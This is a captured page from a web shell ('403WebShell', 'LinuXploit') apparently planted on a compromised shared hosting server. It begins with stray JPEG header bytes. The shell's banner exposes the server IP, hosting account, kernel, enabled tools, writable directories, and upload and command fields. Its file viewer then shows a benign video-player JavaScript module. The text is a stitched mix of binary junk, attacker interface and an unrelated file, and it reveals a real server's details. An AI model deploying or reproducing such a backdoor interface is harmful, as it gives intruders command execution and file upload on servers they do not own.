����JFIF��x�x����'403WebShell
403Webshell
Server IP : 66.29.137.217  /  Your IP : 18.116.81.41
Web Server : LiteSpeed
System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : gltevjme ( 1095)
PHP Version : 7.0.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/gltevjme/gle.gltechlimited.com/public/content/java/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/gltevjme/gle.gltechlimited.com/public/content/java/FWDUVPFPS.js
/**
 * Ultimate Video Player PACKAGED v8.4
 * Finger print stamp.
 *
 * @author Tibi - FWDesign [https://webdesign-flash.ro/]
 * Copyright © 2006 All Rights Reserved.
 */
(function (window){
	var FWDUVPFPS = function(prt){

		'use strict';

		var _s = this;
		var prototype = FWDUVPFPS.prototype;

		_s._d = prt._d;
		_s.frequencyOfFingerPrintStamp = _s._d.frequencyOfFingerPrintStamp;
		_s.durationOfFingerPrintStamp = _s._d.durationOfFingerPrintStamp;
	
		//##########################################//
		/* initialize _s */
		//##########################################//
		_s.init = function(){
			_s.setOverflow("visible");
			_s.setupText();
			_s.getStyle().width = '100%';
			_s.getStyle().pointerEvents = 'none';
			_s.txt.setVisible(false);
		};

		_s.setupText = function(){
			_s.txt = new FWDUVPDisplayObject("div");
			_s.txt.getStyle().display = 'inline-block';
			_s.txt.hasTransform3d_bl = false;
			_s.txt.hasTransform2d_bl = false;
			var txt = '<div class="fwduvp-fingerprintstamp-holder">'
			var obj = window['fwduvpFingerPrintStamp'];
			for (var prop in obj){
				txt += prop + ' ' + obj[prop];
			}
			txt += '</div>';
			
			_s.txt.setInnerHTML(txt);
			_s.txt.setBackfaceVisibility();
			_s.addChild(_s.txt);
		}

		_s.start = function(){
			var rd = Math.random();
			if(rd>= .5){
				rd = Math.random() * 1000;
			}else{
				rd = Math.random() * 1000 * -1;
			}
	
			var t = parseInt(_s.frequencyOfFingerPrintStamp - rd);
			
			_s.stop();
			if(prt.isAdd_bl) return;
			_s.show1_to = setTimeout(function(){
				_s.txt.setVisible(true);
			
				_s.txt.setX(Math.max(0,Math.round(Math.random() * prt.tempVidStageWidth - _s.txt.getWidth())));
				_s.txt.setY(Math.max(0,Math.round(Math.random() * prt.tempVidStageHeight - _s.txt.getHeight())));
				_s.show2_to = setTimeout(function(){
					_s.txt.setVisible(false);
					_s.start();
				}, _s.durationOfFingerPrintStamp);
				
			}, t);
		}

		_s.stop = function(){
			clearTimeout(_s.show1_to);
			clearTimeout(_s.show2_to);
			_s.txt.setVisible(false);
		}
		
		_s.init();
	};
	
	/* set prototype */
	FWDUVPFPS.setPrototype = function(){
		FWDUVPFPS.prototype = null;
		FWDUVPFPS.prototype = new FWDUVPDisplayObject("div");
	};


	FWDUVPFPS.prototype = null;
	window.FWDUVPFPS = FWDUVPFPS;
}(window));

Youez - 2016 - github.com/yon3zu
LinuXploit